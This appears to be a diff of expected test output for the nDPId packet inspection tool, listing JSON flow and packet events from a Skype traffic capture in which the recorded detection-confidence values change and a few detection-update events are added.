-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688560,"flow_last_seen":1431970688560,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688560,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431970688560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688560,"pkt":"0NQSxnP1PBXCt3IOCABFAABALZlAAEAGrHTAqAEiUVNNjchbROcBp2a0AAAAALAC\/\/\/KOQAAAgQFtAEDAwUBAQgKPjJYSAAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431970688626,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970688626,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CBlAAHQGnfhRU02NwKgBIkTnyFsYw7jOAadmtaASIADTOAAAAgQFrAEDAwgEAggKALwVrD4yWEg="} 
@@ -852,14 +852,14 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431970689742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970689742,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ToBAAEAGi5nAqAEiUVNNjcheROdnq4JWnrqPT4AQECwuuQAAAQEICj4yXNIAvBYb"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431970690133,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970690133,"pkt":"0NQSxnP1PBXCt3IOCABFAABEeJ0AAEARfpjAqAEiwKgBAemMADUAMK9udVgBAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431970690190,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431970690190,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA16YwAQDU7dViBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAsABBfOIaY="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970690190,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970690190,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690191,"flow_last_seen":1431970690191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690191,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431970690191,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690191,"pkt":"0NQSxnP1PBXCt3IOCABFAABA15NAAEAGZ+bAqAEiF84hpshfAbtO4sWoAAAAALAC\/\/\/AXwAAAgQFtAEDAwUBAQgKPjJehwAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431970690235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690235,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yF8ZBQnnTuLFqaASOJBGLgAAAgQFrAQCCArsPkNyPjJehwEDAwU="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431970690235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690235,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z6tAAEAGb9rAqAEiF84hpshfAbtO4sWpGQUJ6IAQECydKQAAAQEICj4yXrLsPkNy"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtBpAAEAGkJfAqAEiW77YfchgMD4BM37JAAAAALAC\/\/8o9wAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -910,7 +910,8 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431970697522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05GtAAEAG33HAqAEilQ0gD8hrNFBkkG+a8NlOGoAQECxFMgAAAQEICj4yeso\/iaIX"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970697522,"flow_last_seen":1431970697522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970697522,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431970697522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697522,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJ8VAAEAGrFLAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9fxAAAAgQFtAEDAwUBAQgKPjJ6ygAAAAAEAgAA"} 
-00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1858,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970697478,"flow_last_seen":1431970697568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1431970697568,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1858,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970697478,"flow_last_seen":1431970697568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1431970697568,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1869,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970697478,"flow_last_seen":1431970697921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7129,"flow_avg_l4_payload_len":356,"midstream":0,"thread_ts_msec":1431970697921,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431970697921,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970697921,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXadAAEAGdnDAqAEiUHlUXchq861iaxDLAAAAALAC\/\/\/mhAAAAgQFtAEDAwUBAQgKPjJ8VgAAAAAEAgAA"} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431970698527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698527,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIalAAEAGsm7AqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9b2wAAAgQFtAEDAwUBAQgKPjJ+swAAAAAEAgAA"} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970698661,"flow_last_seen":1431970698661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970698661,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -926,7 +927,8 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431970700273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970700273,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXG9AAEAGZ2LAqAEilQ0gD8hwNFCdm737AAAAALAC\/\/+kFAAAAgQFtAEDAwUBAQgKPjKFdwAAAAAEAgAA"} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431970700316,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970700316,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHC8tiDYnZu9\/KASOJDXAgAAAgQFrAQCCAo\/i4hfPjKFdwEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1431970700316,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970700316,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VdAAEAG0oXAqAEilQ0gD8hwNFCdm738vLYg2YAQECwuAwAAAQEICj4yhaE\/i4hf"} 
-00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1929,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970700273,"flow_last_seen":1431970700360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1431970700360,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1929,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970700273,"flow_last_seen":1431970700360,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1431970700360,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970700273,"flow_last_seen":1431970700419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5338,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1431970700419,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701461,"flow_last_seen":1431970701461,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701461,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431970701461,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701461,"pkt":"0NQSxnP1PBXCt3IOCABFAABABNpAAEAGl07AqAEi1KEIJMhxNFBceQzyAAAAALAC\/\/9qAAAAAgQFtAEDAwUBAQgKPjKKDQAAAAAEAgAA"} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701508,"flow_last_seen":1431970701508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701508,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -939,7 +941,8 @@ 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431970703073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970703073,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2zBAAEAGwPfAqAEi1KEIJMhzNFD26tn9AAAAALAC\/\/\/8RgAAAgQFtAEDAwUBAQgKPjKQRwAAAAAEAgAA"} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2017,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431970703145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970703145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHPVGwsc9urZ\/qASOJBaugAAAgQFrAQCCAo\/nFogPjKQRwEDAwk="} 